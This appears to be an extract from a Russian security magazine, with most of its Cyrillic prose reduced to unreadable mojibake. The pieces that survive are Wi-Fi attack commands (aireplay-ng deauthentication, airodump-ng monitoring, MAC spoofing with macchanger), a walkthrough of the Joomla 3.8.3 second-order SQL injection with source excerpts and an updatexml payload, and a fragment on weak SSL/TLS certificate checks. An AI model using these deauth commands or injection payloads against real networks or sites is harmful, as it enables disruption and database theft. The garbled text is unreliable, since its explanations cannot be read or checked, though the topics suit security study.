????�?� ?� OUI� ?� ????�?� ????�???�?� ?� ???�??�????� ???�????� ?� MAC?????�??
????�??�??�?�??�???�???�?.
??�???� ????�?� ???�????� ????�??,� ?� ???????� ???�?????� ???????�???
???�?????��??�??�???.
iw爎eg爏et燘O
??�???� BO,�??�?????�??�??�????�??�?�??????�?????�???�?�???�??
AM,� BZ,� GR,� GY,� NZ,� VE� ?� ???�??� (???�??� ???�??� ????�?� ?� ???�?� db.txt,
????�?� ??� ????� ????� ??� ????�?� ?????� ??� ???�??).� ????�????�?� ???�???�?
?????�???�??�?�???�??:
iw爎eg爂et
??�??� ????�?� ???�?????� ???�???�?� ?????�????� ???�????� ???� ???�????�?
???�??�??�???�???????�?:
iwconfig爓lan1爐xpower�
???�???�?�??:
ifconfig爓lan1爑p
?�??�???�?�?????�??:
iwconfig
???�??�???????�?�??�??�?�??,�??�?�????�???�???.
??�?� ??� ???�???,� ??� ???�?????�?� ???�???� ?????�?� ???� ???.� ???�?� ????,� ???
?????� ???�???�?� iw� reg� set� ?????� ????�???�???� ????�??.� ??� ????� ?????�
????� ?????� ?????�?????� ?� ????�????� ath9k� htc� ?� ?????� Qualcomm� Atheros
AR9271.� ??� ???,� ?� ???�???�?,� ???�???�??�?� ??????� AWUS036NHA.� ????�???�
?????�????��??�???�???�?????,�???�?????��??�??�???�???燣inux.
INFO
???�???�?� wireless� regdb� ???�???�?� ?� ???�?
db.txt�???�?�???�?.��??�?�??�???�???�??
?��???�??�??�????�??�??�?????,�?�?�???�
??� ????????�?.� ????� ????� ???�?????� 36� ???,� ??
???�??� ??� ????,� ???� ????� ?????� ??� ???�?� ???�??
????�????�??.� ????�???�??� USB?????�????
??�?????�???��?��??�????�??�?�???�????�
??????� ????�???�??.� ????�?????� ?????�????
???�????�??????�?�?�??????.
???�?� ???�???�??� ???�????� ???�?� ?????�?� ????????�??� ?????�???� ???�?
??� AP� ?� ??????�?????�?� ???????�?????�??� ???�??�??�??� ?� ???� ???�????.
?� ???�???� ????� ??� ???????� ???�?� ???�???� ???�??�?� 20� ???�??� ?� ???� ????�
??????� ???�?.� ???� ???�???�??� ???�????� ???????�???� ??� ???�???� ????�?
??�??�??�????�?燿eauth.�???�??�???�??�????�??�??���?��??,�?
???�???�???�??�????�????�?�??�????��??�??�??�???�?�?????�?�????
????�?�????.
??�?????�??�??�??�???�?
??�?� ??????� ???�??�??,� ??� ??� ???�??� ?????�???� ??� ???� ??� ????�???.� ???�?
???�????� ????�???� ???� ??� ???????� (??.� ??????� �???� ??� GPU�)� ???� ?
????????????�????�????�??�???.
???�??�?????�燛DPR
???�??�?�??�???�?��??�???��???�?
???�?�???�????�??�?????�?�????�????�??�?????� .cap�爃ashcat�� ????�
????�??�??�??�.pcap.�??�???�?????�.cap��.pcap�??�?��??????爐shark:
tshark�F爈ibpcap�w�???_?????_pcap>�r�???_?????_cap>�
??�??� ??� ??????� ?� ????�?� Wi?Fi� ??� ????�??�?,� ??� ?????�???� ????�??????
???�?��???�????�?????�?�(?�?????�??��??�????�?�????�????).�??�?
????????� ????�??� ???�??�???� ???�?� ???� ????�??� ????�???� ?� (????????�?)
????�??� ????�???�??,� ?� ?????� ???�?� ??????�?� ?� ??????�???� ???�????� ??
???????�????.� ?� ????� ?????� ???� ???� ??� ???�????� ?� ???� ????� ???�??� ???
?� make/install� ?� ????�??� ???�??.� ????� ????� ?????�?� ???�??????????�?,� ?
??????????� ????????� ?� ?????� ????� ?????,� ?� ???�??� ???�?� ????�?� ????�??
?�????�?�??�???�??燢ali.
??????�????�??????�????
???� ???�??�??�??� ????� (SSID� ???� ESSID)� ????�?� ???�????�?� ????�???
???� ??� ??????.� ???�???�???�?,� ???� ????�???�?� ?????�?� ?� ?????� ????�???
???�??�???�?� ?� AP� ?????�?� ?????�???�?:� ????� ????� ??� ???�?,� ???�??� ??
??�??�???.�???�?�?????燬SID�?????�?�???�?:�??�??????�??�??�???�?
????�??�???�?��???.
???�??� ???�??� ???�???�?� ?� �?????�????粻 ???� ????� (SSID),� ??� ???�????
????�?????�??� (BSSID,� ????�?� ???�???�?� ?� MAC� AP)� ?� ????� MAC??????.
?????�?� ???�?� ????�?????�??� ???????� ??????�???�?� ???� ????�????� SSID
????�??�????.�???�???�??�????�?????�??�????�??�??�??�????�??????�
????� ???�???� ?� ???�?????� ???�?� ???�???,� ??� ??� ???�?� ????�?� ??� ???.� ????�
?????�?�???????�???�??�??�????�?��????�???.
airodump?ng爓lan1
???�?????�???�?,�??�???�????�???�???�???�??爓lan1,�??�??�????�??
???�???�?,��??�?�????�????��????�?????�?.�???�??�??,�?�???�?
??????�??�(ifconfig爓lan1燿own),�燼irodump?ng�??�?????�??�??�爉oni?
tor爉ode.
?????�??�???�?�???�??????�?�??�?,�????�?�????�???�??�??�???.
?????�?� ???�??� ????� ???�?????� ?� ?????�??� ?� ???� ??????�???�???�??
?????�?� ????�?????�??,� ???�????� ????� ???�????� ???�?????� AP� ??????� ????�
???�???�?��???�?????�?燬SID�?�???�???.
aireplay?ng�0�a燚8:FE:E3:XX:XX:XX爓lan1
????�????�??�?�????�???�???�??????燿eauth�???�??�????�??�?�???�
????� ?� MAC?????�??� D8:FE:E3:?� ???� ?????� (?????� ????�?,� ???� ????�?,� ?????�
???,� ???�????�??� ???????�?).� ??????�??� ??� ???�????� ????� ?????.� ???�???�?
???�?��???????�???燼irodump?ng�????�???�??�???.�???�??�???�????�
??,�???�?�??�?�???�???????�??�??�?�(?�??�??�??�???��????�???�
?????).
???�??�???�?燬SID�???�??�???
???????�?????????�?燤AC-??????
??�??�?????�?�???�?�??�???�????�???�?�??�??�??�??�?????�??,�???�
?????� ???�??�???�?� ????�?� ?????�??� c� ????�????�???� MAC?????�???.
?� ??????� ????�??�??� ??� MAC� ???�?� ???�???� ????�??� ?� ????�???�??� ????�
?????�??�?????�????,�???�???�?�??�??????�??�??�?????.
??�???� ???� ???�?� ???�??:� ????� ???�??�???� ??????�???� ?????�?????
?� ???�?????� ???�??� ???�???,� ???�??,� ???� ?????�??????�?� ????� ?� ??� �????
????�?�.�???�???�??�???�??�????��??????燗P��???�????�??�(?????�?
??????�?????��???)燤AC??????�??�??�???�???燱i?Fi.�??�?�?????�???�
???�???�?� ????�?� ???????�???� ?????�?,� ?????�?� ????�?????�??� ???�?
?????�???�????�???�?��??�??�???�??�?????��?????�???�?�?�??�???
???�??.�??�??�??�??�????�?????�?�?燗P�?�??�???�???.
1.�??�???�?�??�????�???�???,�??�???�?�??燤AC??????��?????�??
?�????�?????�?�(??.�??�??�????�?????).
2.�??�???�???:
airodump?ng爓lan1
?�??�???�????�???�?????�?�??�?�??�???�燤AC?????�?�??�??�??�??
?�??�??�????�(??.�???�??牜STATION粻???�????�??�??燗P).
??�???燤AC?????�?�??�????
3.�???�??????�???�?�?�??�?�??�???�???燤AC??????.
macchanger�?mac=64:DB:43:XX:XX:XX爓lan1
4.�?�??�???�???�???�???�?????�???�?????�??.
aireplay?ng�0�a燚8:FE:E3:XX:XX:XX爓lan1
5.�??�??�???�?�??�??�???�????,�??�???�?�??�?????�??�??�???�??�?
??燗P.
??????
???� ?????�????� ?????�???�???� ???�????� ???�??�??�??� ?????� ???�???� ?????�
??????� ???�??????� ????� USB?????�????� Wi?Fi� ?� ???�?????�?� ??????
?�?????�???�?.�??�??�???�???�?�???�??�?????�??�?????�??�???�??
?�???????�??�????�??????�???,�??�????�??�????爐xpower.
????�??�??�??�??�??�??�???��???�??�??�??�????�?燤AC?????�??
???�?�??�???�??�?�?�???�?.燬SID��??�??????�???�?�?牜??????�????�
??粻 ???�?� ??????,� ????�?� ???�??????� ???�??�???� ???�???�?� ???� ???�?
?????�??�??�?�???�?????�??.
?????
????????
??牜??????�
??????�????????
SQL?????????
???????�??????
??�??????
??????????�燡OOMLA
aLLy
ONsec
@iamsecurity
Joomla��??�??�?�??????�????�??�???�??????�??�???�
????�??�?燱ordPress.�??�??????,��??????�?�?????�??
?� ????� ??????,� ???�???�?� ???�????�?� ???� ???�??� ????�??
?????�??�????�??�???�???�??�???�??�燙MS�?�?????�
????�?????�?,�?�?????�?�?�????�????�???�???�??.
????�???� ???�?????�?� ???� ?????�??�???� ???�??� Joomla� ??????� ??� 3.8.3.
?� ???????� ????�??� ?????�???�???� ??� ???�????� RIPS� Technologies.� ????�
???????� ??????�?� ????�?????�??� CVE?2018?6376.� ?� ???�??� 3.8.4� ???� ????
??????�???�??�????�?????燙MS,��??�???�???�?��???�?�?��???�?.
???�??�??�??�?????� ???�??????� ???�?,� ????�??� ???�???�????� ??????�
????��??�???�??�???.�??�??�?????�?�???�??�??,��??�??�????�???�
?????�??�?????�???��??�???�??�????爏econd爋rder燬QL.
?????
???� ???�?????�??� ???�??�??� ???�??� ?????� ???????� ?????.� ??????�???,
?燡oomla�???�??�????�??�?????�????�?�??�?燚ocker燞ub,�??�?�?????
???�?�??�??�?????�??�??燙MS.�?�?????�?????�?��?�???��??�?????�
??�???�??�??�??,�??�???�?�???�???�??�??�?�??�???�???�????�???.
???�???�????�???�??�??�??�燚ebian�
docker爎un�ti�p80:80�?rm�?name=joomlavh�?hostname=joomlavh�
debian�/bin/bash
???�??�??�???�??????:燤ySQL,燗pache�燩HP�0.
apt?get爑pdate�&&燼pt?get爄nstall�y爉ysql?server燼pache2爌hp爌hp7.
0?xml爌hp7.0?mysqli爊ano爓get
??�???�???燙MS.�??�??�?�??�??�8.3.
cd�/var/www/html/
wget爃ttps://downloads.joomla.org/cms/joomla3/3?8?3/
Joomla_3?8?3?Stable?Full_Package.tar.gz?format=gz
tar爔zf燡oomla*
chown�R爓ww?data:www?data�.
?�??�?????:�???�???�??�??�??�???��??�???�???�??�??�??�??????
????�??�?�??�???�??.
service爉ysql爏tart�&&爏ervice燼pache2爏tart
mysql�u爎oot�e�"CREATE燚ATABASE爅oomla;燝RANT燗LL燩RIVILEGES燨N�*.
*燭O�'root'@'localhost'營DENTIFIED燘Y�'megapass';"
???�?�??�?�???�?????�????�?�?�??�????�????�??????�??��???�?????
CMS.
??�????�?燡oomla�8.3
???�??�???�??��??�???燤anager,�????�???�????�??�???????�??�??�?.
??????????? ??????
?
? �?????�?????
?????
???????? ??牜??????�
??????�????????燬QL?????????
???????�??????�?�??????
??????????�燡OOMLA
?????????�?�?????????
??� ????�?� ???�????�?� ???�?� ??????,� ???� ??????� ????�???� ?� ?� ??????�???
???�???�??� ?????� ???????�??� ?� ???????�???�??� ????�???�?� ???�???�?
Hathor�(Hathor爌ostinstall爉essage).
?????�??�????�?�燚eveloper燦etwork
Hathor� ?� ???� ???�????� ????�?� ??� ???�??�????�?????� ??????????�????
????�??�??�??�??�?????,��??????�??�????�???燡oomla.
???�???�?�??�????�?????�???�??�??�???�??�燡oomla
??�???�????�?????�???�?�??�????爄sis�(??�??�??�??�??:�?�??�??��????
??????�??�?,��?�??�????�??��?�???�???�??),�?�???�?????�?�???�
??????�???�??�?????�??��??�???�??�??�???.�??????�?�??�???�??�?
??�???�?
/administrator/index.php?option=com_admin&view=profile&layout=edit
???�???�?�??�???�?????�?�???�?????�?
??�???�??�???�??�?�?????�?��??�?�??????�??.�?�??�??????�??????�
???�??�?,�??�???�?,�???��??�???,�??????�???�?�???�???.
???�??��??�??�??燬QLi
???�?????,�??�???�?????�??�?????��???爃athormessage.php.
/administrator/templates/hathor/postinstall/hathormessage.php
19:爁unction爃athormessage_postinstall_condition()
20:爗
...
22:牋牋�$user牋牋牋牋牋�燡Factory::getUser();
...
39:牋牋�//燝et爐he燾urrent爑ser燼dmin爏tyle
40:牋牋�$adminstyle��$user?>getParam('admin_style',�'');
41:
42:牋牋爄f�($adminstyle�!=�'')
43:牋牋爗
44:牋牋牋牋�$query��$db?>getQuery(true)
45:牋牋牋牋牋牋�>select('template')
46:牋牋牋牋牋牋�>from($db?>quoteName('#__template_styles'))
47:牋牋牋牋牋牋�>where($db?>quoteName('id')�.�'��'�.�$adminstyle[0]
)
48:牋牋牋牋牋牋�>where($db?>quoteName('client_id')�.�'��);
...
50:牋牋牋牋�//燝et爐he爐emplate爊ame燼ssociated爐o爐he燼dmin爏tyle
51:牋牋牋牋�$template��$db?>setquery($query)?>loadResult();
???�?� ???�?� ???????�??� $adminstyle� ???�????�?� ?� int,� ???�??,� ???� ???
?� ???�?.� ????�?� 40� ???????� ???� ?� ???,� ???� ???�????� ???????�??� ?
???�?????�??�?????�?????爂etParam�?�???�?燯ser.
/libraries/src/User/User.php
024:燾lass燯ser爀xtends燶JObject
025:爗
...
318:牋牋public爁unction爂etParam($key,�$default�爊ull)
319:牋牋{
320:牋牋牋牋return�$this?>_params?>get($key,�$default);
321:牋牋}
??�????�?�($this?>_params)�?????�?�???�?????�?��??�????�???�????�
??燫egistry.
/libraries/src/User/User.php
233:牋牋public爁unction燺_construct($identifier��燯serWrapper�$
userHelper�爊ull)
234:牋牋{
...
242:牋牋牋牋//燙reate爐he爑ser爌arameters爋bject
243:牋牋牋牋$this?>_params�爊ew燫egistry;
???� ???�????�????� ????�?????�?,� ???�??????� ???�??� ???�???� ?� ???�??
??????�???�?� ?� ????�???????�??�?� ???�???�???� ???�??� ??????�?� ?� ???
???????�??.� ?� ???� ???�?� ?� ???�??� ???� admin_styles.� ???� ????�???� ????
??????�??�??�????.�???��??�????,�??�??????�?�????�?????�??�???�
????�?????�?�??�?.
??�??� ????�??� ????�??� ?� ???�????� ???�??� ???�???.� ?� ???�??�??
??????� ?????� ????�??� ?� ???�???�?� jform[params][admin_style].� ???� ???� ?
???�??�?????�?�??�??�??�???�??�???,�?�????�???�??????�??�?????�
??.
??�??�????�????�?��???�??燼dmin_style�?�??�???�?�???�????�??�
????�???�?????�?
??�???� ??????�??� ??� ????�??� ????�???� ???�????�??� ??????� ?� ???�???�?
????�?燬QL????�????�?.
????�?燬QL��?????�??????�??燡oomla
???�????�?????????�???�?????�??:
0燼nd爑pdatexml(0x3a,燾oncat(1,�(select爑ser())),�#
??�?????燬QL????�????�燡oomla�8.3
???�燬QL????�????�???爏econd爋rder!
??�???�??�??�??�??�??�???�?????�???��???�??�??��???�???�???
admin_styles� ??????� ????�?????�?,� ?� ?????� ???� ???�??� ?� ?????� ????
??????�?� ?� ???�??� ?????�?� ??� ???�???.� ???�?????� ?� ?????� ???�????�??
??????�???????,�??�????,�?�??�?�??�????�????燘urp燬uite.
??�???�??�??�??�??��???�??�??
??�???� ???�????�?,� ???� ????�???�?� ???� ????�????.� ???�????� ?� ?????�???
????�?????�?�??�???�?.��???�?????�???�???�??�??爉essage.
/administrator/templates/isis/index.php
300:牋牋牋牋牋牋牋牋<div燾lass="span12">
...
302:牋牋牋牋牋牋牋牋牋牋<jdoc:include爐ype="message"�/>
??�??�??�?????�???�?�??�?????�??�??�????�??,�???�????�?�????�
???��???�??�?�??????�????�?????�??�???�?.
??�???燚OM????�????,�??????�???�???�?�???�????��?????
???????�??
/administrator/templates/isis/html/layouts/joomla/system/message.php
12:�$msgList��$displayData['msgList'];
...
17:牋牋�?php爄f�(is_array($msgList)�&&�$msgList)��>
18:牋牋牋牋�?php爁oreach�($msgList燼s�$type�>�$msgs)��>
19:牋牋牋牋牋牋�div燾lass="alert�?php爀cho爄sset($alert[$type])��$
alert[$type]��'alert?'�.�$type;�>">
...
20:牋牋牋牋牋牋牋牋�button爐ype="button"燾lass="close"�
data?dismiss="alert">&times;</button>
21:牋牋牋牋牋牋牋牋�?php爄f�(!empty($msgs))��>
22:牋牋牋牋牋牋牋牋牋牋�h4燾lass="alert?heading"><?php爀cho燡Text::
_($type);�></h4>
23:牋牋牋牋牋牋牋牋牋牋�?php爁oreach�($msgs燼s�$msg)��>
24:牋牋牋牋牋牋牋牋牋牋牋牋�div燾lass="alert?message"><?php爀cho�
$msg;�></div>
25:牋牋牋牋牋牋牋牋牋牋�?php爀ndforeach;�>
26:牋牋牋牋牋牋牋牋�?php爀ndif;�>
???�??�???�????�????�?�?�??�??�?� msgList�??�???�$displayData.�???
???�??� ?????�???�?� ???� ??????� ??????� render� ????�?� MessageRenderer,
???????,� ???� ???�???� ??� ???�????,� ????�???� ??� ???�?????�??� HTML?????
???�??�???�??�?�?????�???�?????�?.
/libraries/src/Document/Renderer/Html/MessageRenderer.php
22:燾lass燤essageRenderer爀xtends燚ocumentRenderer
23:爗
...
35:牋牋爌ublic爁unction爎ender($name,�$params�燼rray(),�$content��
null)
36:牋牋爗
37:牋牋牋牋�$msgList牋牋��$this?>getData();
38:牋牋牋牋�$displayData�燼rray(
39:牋牋牋牋牋牋�'msgList'�>�$msgList,
40:牋牋牋牋牋牋�'name'牋牋=>�$name,
41:牋牋牋牋牋牋�'params'牋=>�$params,
42:牋牋牋牋牋牋�'content'�>�$content,
43:牋牋牋牋�);
...
60:牋牋牋牋爎eturn燣ayoutHelper::render('joomla.system.message',�$
displayData);
???�??�??�?????�???�????�??�??�???�????爂etData.
/libraries/src/Document/Renderer/Html/MessageRenderer.php
70:牋牋爌rivate爁unction爂etData()
71:牋牋爗
72:牋牋牋牋�//營nitialise爒ariables.
73:牋牋牋牋�$lists�燼rray();
74:
75:牋牋牋牋�//燝et爐he爉essage爍ueue
76:牋牋牋牋�$messages�燶JFactory::getApplication()?>getMessageQueue
();
77:
78:牋牋牋牋�//燘uild爐he爏orted爉essage爈ist
79:牋牋牋牋爄f�(is_array($messages)�&&�!empty($messages))
80:牋牋牋牋爗
81:牋牋牋牋牋牋爁oreach�($messages燼s�$msg)
82:牋牋牋牋牋牋爗
83:牋牋牋牋牋牋牋牋爄f�(isset($msg['type'])�&&爄sset($msg['message'])
)
84:牋牋牋牋牋牋牋牋爗
85:牋牋牋牋牋牋牋牋牋牋�$lists[$msg['type']][]��$msg['message'];
86:牋牋牋牋牋牋牋牋爙
87:牋牋牋牋牋牋爙
88:牋牋牋牋爙
89:
90:牋牋牋牋爎eturn�$lists;
91:牋牋爙
??�???�??� ?????�?� ??� ???�???,� ???????� CMS� ????�???� ???�?????
?�??????�?????爂etMessageQueue.
/libraries/src/Application/CMSApplication.php
465:牋牋public爁unction爂etMessageQueue($clear�爁alse)
466:牋牋{
467:牋牋牋牋//燜or爀mpty爍ueue,爄f爉essages爀xists爄n爐he爏ession,�
enqueue爐hem.
468:牋牋牋牋if�(!$this?>_messageQueue)
469:牋牋牋牋{
470:牋牋牋牋牋牋$session�燶JFactory::getSession();
471:牋牋牋牋牋牋$sessionQueue��$session?>get('application.queue',�
array());
472:
473:牋牋牋牋牋牋if�($sessionQueue)
474:牋牋牋牋牋牋{
475:牋牋牋牋牋牋牋牋$this?>_messageQueue��$sessionQueue;
476:牋牋牋牋牋牋牋牋$session?>set('application.queue',燼rray());
477:牋牋牋牋牋牋}
478:牋牋牋牋}
479:
480:牋牋牋牋$messageQueue��$this?>_messageQueue;
481:
482:牋牋牋牋if�($clear)
483:牋牋牋牋{
484:牋牋牋牋牋牋$this?>_messageQueue�燼rray();
485:牋牋牋牋}
486:
487:牋牋牋牋return�$messageQueue;
488:牋牋}
??�??�????� ?� ???�???� ???�???�??�?� ??� ???�??� ????�???� ????� ??� ???�?
?????�????.� ???�??� ???� ????�???�?� ??????� com_cpanel.� ??,� ????�???�?,
?�???�???�?�?????��???�??�??�??�??�??????��?????�???�??�?????�
?????�?????燿isplay�?�?????�?�??�???�???燙MS.
/libraries/src/MVC/Controller/BaseController.php
614:牋牋public爁unction燿isplay($cachable�爁alse,�$urlparams�燼rray
())
615:牋牋{
...
621:牋牋牋牋$view��$this?>getView($viewName,�$viewType,�'',燼rray('
base_path'�>�$this?>basePath,�'layout'�>�$viewLayout));
...
672:牋牋牋牋牋牋$view?>display();
????�????�??�???�?�?�???�??�????�??,�??????�?????�???�?��??�??
??????,��????�???�????燿isplay�??��?�??�??�??.
/administrator/components/com_cpanel/views/cpanel/view.html.php
17:燾lass燙panelViewCpanel爀xtends燡ViewLegacy
18:爗
...
33:牋牋爌ublic爁unction燿isplay($tpl�爊ull)
34:牋牋爗
????�?�??�????�?� com_cpanel�???�????�?�???�????,�??�???�???�???�
??�???�??�?.
/administrator/components/com_cpanel/views/cpanel/view.html.php
50:牋牋牋牋爐ry
51:牋牋牋牋爗
52:牋牋牋牋牋牋�$messages_model�燜OFModel::getTmpInstance('Messages'
,�'PostinstallModel')?>eid(700);
53:牋牋牋牋牋牋�$messages牋牋牋��$messages_model?>getItemList();
54:牋牋牋牋爙
55:牋牋牋牋燾atch�(RuntimeException�$e)
56:牋牋牋牋爗
57:牋牋牋牋牋牋�$messages�燼rray();
58:
59:牋牋牋牋牋牋�//燬till爎ender爐he爀rror爉essage爁rom爐he燛xception�
object
60:牋牋牋牋牋牋燡Factory::getApplication()?>enqueueMessage($e?>getMes
sage(),�'error');
61:牋牋牋牋爙
62:
63:牋牋牋牋�$this?>postinstall_message_count�燾ount($messages);
??�???�??� ??????�???� ???� ??????� ????�???�?� FOF� (FrameworkOnFrame?
work).� ???�???� ???� ??????�?� ?????�???� ????�?� PostinstallModelMessages
??� ??????� com_postinstall,� ?� ?????,� ???� ??????� ??????� getItemList,
?????�???�?� ?????� ??????� buildQuery� ???� ?????�???�???�?� ?� ???�??�??
??????� PostinstallModelMessages.� ????� ?????� ???�???�?� SQL????�??
???�????�?�???�????�?�??�???.
/libraries/fof/model/model.php
1215:牋爌ublic爁unction�&getItemList($overrideLimits�爁alse,�$group�
=�'')
1216:牋爗
1217:牋牋牋爄f�(empty($this?>list))
1218:牋牋牋爗
1219:牋牋牋牋牋�$query��$this?>buildQuery($overrideLimits);
/administrator/components/com_postinstall/models/messages.php
17:燾lass燩ostinstallModelMessages爀xtends燜OFModel
18:爗
...
28:牋牋爌ublic爁unction燽uildQuery($overrideLimits�爁alse)
29:牋牋爗
30:牋牋牋牋�$query�爌arent::buildQuery($overrideLimits);
31:
32:牋牋牋牋�$db��$this?>getDbo();
33:
34:牋牋牋牋�//燗dd燼爁orced爀xtension爁iltering爐o爐he爈ist
35:牋牋牋牋�$eid��$this?>getState('eid',�0);
36:牋牋牋牋�$query?>where($db?>qn('extension_id')�.�'��'�.�$db?>q($
eid));
37:
38:牋牋牋牋�//燜orce爁ilter爋nly爀nabled爉essages
39:牋牋牋牋�$published��$this?>getState('published',��'int');
40:牋牋牋牋�$query?>where($db?>qn('enabled')�.�'��'�.�$db?>q($publis
hed));
41:
42:牋牋牋牋爎eturn�$query;
43:牋牋爙
??�??� ???????�??� ???�??� ?????�???�?� ?� ????�???� ?????�?� ??� ???�???
postinstall_messages.�??�??�??�??�????�??:
SELECT燻#__postinstall_messages`.*
FROM燻#__postinstall_messages`
WHERE燻extension_id`��'700'燗ND燻enabled`��'1'
???�?�?????�??�?????�????�????�?�????�???�?�????燺getList.
/libraries/fof/model/model.php
1225:牋牋牋牋牋牋牋�$this?>list��$this?>_getList((string)�$query,�$
limitstart,�$limit,�$group);
1226:牋牋牋牋牋爙
1227:牋牋牋牋牋爀lse
1228:牋牋牋牋牋爗
1229:牋牋牋牋牋牋牋�$this?>list��$this?>_getList((string)�$query,�
0,�$group);
1230:牋牋牋牋牋爙
1231:牋牋牋爙
1232:
1233:牋牋牋爎eturn�$this?>list;
????�?�???�??�???�??�????爋nProcessList.
/libraries/fof/model/model.php
1950:牋爌rotected爁unction�&_getList($query,�$limitstart���$limit�
=��$group��'')
1951:牋爗
1952:牋牋牋�$this?>_db?>setQuery($query,�$limitstart,�$limit);
1953:牋牋牋�$result��$this?>_db?>loadObjectList($group);
1954:
1955:牋牋牋�$this?>onProcessList($result);
1956:
1957:牋牋牋爎eturn�$result;
1958:牋爙
??�??� onProcessList� ???�???�???� ??� ????� ???�??�??� ?� ????� ???�??�??
?�????�???�?�??�?,�??�??�???��???� condition_file,�??�???,�??????
???????�?��???燾ondition_method.
??�???�?�??�???爌ostinstall_messages.�??????�??�???�??�???�?
??�???��??�???,�??????�????�????�???
/administrator/components/com_postinstall/models/messages.php
124:牋牋protected爁unction爋nProcessList(&$resultArray)
125:牋牋{
...
132:牋牋牋牋foreach�($resultArray燼s�$key�>�$item)
133:牋牋牋牋{
134:牋牋牋牋牋牋//燜ilter爋ut爉essages燽ased爋n燿ynamically爈oaded�
programmatic燾onditions.
135:牋牋牋牋牋牋if�(!empty($item?>condition_file)�&&�!empty($item?>
condition_method))
136:牋牋牋牋牋牋{
137:牋牋牋牋牋牋牋牋jimport('joomla.filesystem.file');
138:
139:牋牋牋牋牋牋牋牋$file�燜OFTemplateUtils::parsePath($item?>condit
ion_file,爐rue);
140:
141:牋牋牋牋牋牋牋牋if�(JFile::exists($file))
142:牋牋牋牋牋牋牋牋{
143:牋牋牋牋牋牋牋牋牋牋require_once�$file;
144:
145:牋牋牋牋牋牋牋牋牋牋$result�燾all_user_func($item?>condit
ion_method);
???� ??� ?� ???�?????� ?� ????,� ?� ????� ??????,� ?� ??????� ???�????� ???�???
hathormessage_postinstall_condition.
????????????�?????????�(?????)
??????
?�??????�??燙MS�????�??�???�??????��????�??�???�???�?????.�??,
???�????,� ????� ????�???�?� ?� ???????� ???�????�???� ???�???� ????.� ????�
?????�????��??�?????�??�????�?�??�?�???�???�????�??�?��???�???�
?????,�?�??�???�?�???????,�??�??�?�??????.
??�?� ???�??????� ?????� ????� ??????�?????� ???� ??????�??� ???�???�??
?� ???�???� ?,� ???�????,� ???� ?????�????� ???�??� ?????�???�?????�?.� ???� ???
????��???�?????�???�??�???燡oomla,�?�?�??�?��???????�?.
?????
???????????
?????
?????????�?????????�???????
????????????燬SL�燭LS
?�???????????�????
???�???????�?�??�??????�??�??�??�???�
???,� SSL/TLS????�????� ???�?� ????� ?????�
??????� ??????�?� ????�?� ???� ????
???????�??�???????????�?????�??.�???�
???� ??� ??????�???�?� ???� ???�??�???� ?????�
???�??�???�??� ???�????�??� ?????�?????�
????,� ???�????�??� ?� ????�?,� ???� ??????�?
???�??�??� ???�??????� ??????�???� ??� ????�
?????�???�???�??�??�?????��??�??�??
???�??�????,� ?????� ???� PayPal� ?� Amazon,
???�
???????�?�
??????�??�
???�??
?� ????????� ???�???�?,� ???�??????
???????�?� ?� ???�??�??�??� ?� ?????�??????�
???� ???�????� ?� ??????�??� ???�???�???
iOS�燗ndroid.�??�?????,�??�??�???�???,
???�?� ?????� ????�?� ????�??�???�??
???????�???�
???�???�
???�?????�??
???????�????,� ??????�?� ???�???�??.
?�???�?????�?�??�???�??,�??�???????�
?????� ????� ???�?????�??� ????�?????�???
??�???�???.
?????�????
???????�?�?????????????
????????????.�??????????
??????,�????????????
�?????�?????????�
????????????�???????�,�
?????????�?????�???????
???�???????????.�??????
????????????????
?????????��??????????????
????????,�????????��????
??,�????????????
?????????.
vedacoder@mail.ru
??????�??�????
?� ??????,� ???????�??� SSL/TLS????�???�??� ?????�????� ???�??� ?????�
????????� ???�????�????�????,� ???�????�????� ?� ?????�?????� ???�?????�??
???�??�??�?� ?� ???�????�?� ???�?,� ????� ????� ?� ????� ???�??� ????????� ?????�
???????� ???�???�?????:� ???�?� ????� ???�?????� ???�?????� ???�??,� DNS
????????,� ?� ???�?� ???�???� ?� ???�??�???�???,� ???�?????�?� ?� Wi?Fi� ???�???�
????�???� ???�???�????�??,� ???????,� ??????� ???�?� ???�???,� ???�??�???�?
SSL/TLS???????.� ???�?� ????,� ???�?� ???�??�???� ????� ????�???� ???�??�???�?
?� ?????�???� ???�???,� ???�???�?????� ?????� ???�?????� ???????� ?????� ????�
????� (???�????,� ?????� ???????�??� DNS)� ?� ???????�?????� ???�??� ????�?
?????�???�??�???�?�???�??�???�??�??�??�??.
??�????�????� ???�?????�??� ?� ?????� ???????� ????�???,� ???� ?????�??,
???????� ???????� ??� ????�?????�?� ???�??�?� ????�????�????�???� ???�??????�
??,� ???�??�?????�???� ???�????� ???� ????�??�?� ?????�????.� ?� ???� ???�?
??� ????�?????�?� ?????�????� ??????� ???�??� (cipher� suite),� ??????�?� ???�??
?� ???�??� ????�???�?� ???� ????�?� ???�???.� ???� ????� ???�?� SSL/TLS???????�
?????�???�??�?????�??????�??,�??�??�???�???��??�?�??�???�??�??
???�???�?�???�???????�?��??,�??:
? ???�??????�????�??�???�???�???�??�??�?????�???
? ????�??�??�????�?�????�(???�??�??????�?�??�???�??)?
? ?� ????�?� ???????�?????� ?� ???�?????�?� ????� ???�???�??�?� ???� ?????,
?�?????�?�??�???�??�?�??�??�????.
??????????�??�?????:�???????�????????
??�???� ??� ???�??� ???�???�???� ?� ???�????�??,� ???� ???????� ???????�????
???�?????�??� ?????� ???�??�?,� ???�???�?� ???�??�?� SSL/TLS????�?????�?,
?�???燛V?SSL,� ???�?????�?��??�????�??�??�??�??,�??�?????�??�????�
??,�??�??�??�???�??�???�??�???�??????�??�??�???�????�??�??:燣in?
ux,燱indows,燗ndroid�爄OS.�??�?�??�?????�??�?,�??�?????�爉iddleware?
???�????�??�?�?�?????�??�?????:
? Amazon???????� Java????�????�?� EC2� ?� ???� ????????� ????�???????�???,
???�??�????�?�?�???�??
? Amazon???????� ?� PayPal???????� ???�????� SDK,� ??????�???�??� ??� ???�????
???�??�??� ???�??????� ??� ???�??� (??� ???????� ???�????�?� ??????????�???
??????????�?????)��??�??�??�??�???
? ??�????�????�??� �??�???�,� ?????� ???� osCommerce,� ZenCart,� Ubercart
?燩restaShop,�??????�?�??�???�?�??�?????�?�???�??
? AdMob????,� ??????�?????� ??????�??� ???�??� ???� ??????� ???�???�???
???�????
? ??�?????�???� ????�???????�????�?� ElephantDrive� ?� FilesAnywhere,
??????�???�??�?�??�??�??�????��???????�??�???�???
? Android????�??�????�?燩usher��???�???,�??????�?????�???燩usher燗PI
???� ???????�??� ????�??� ????�??�???� ????�???�??� (???�????,
GitHub???????燝aug.es)?
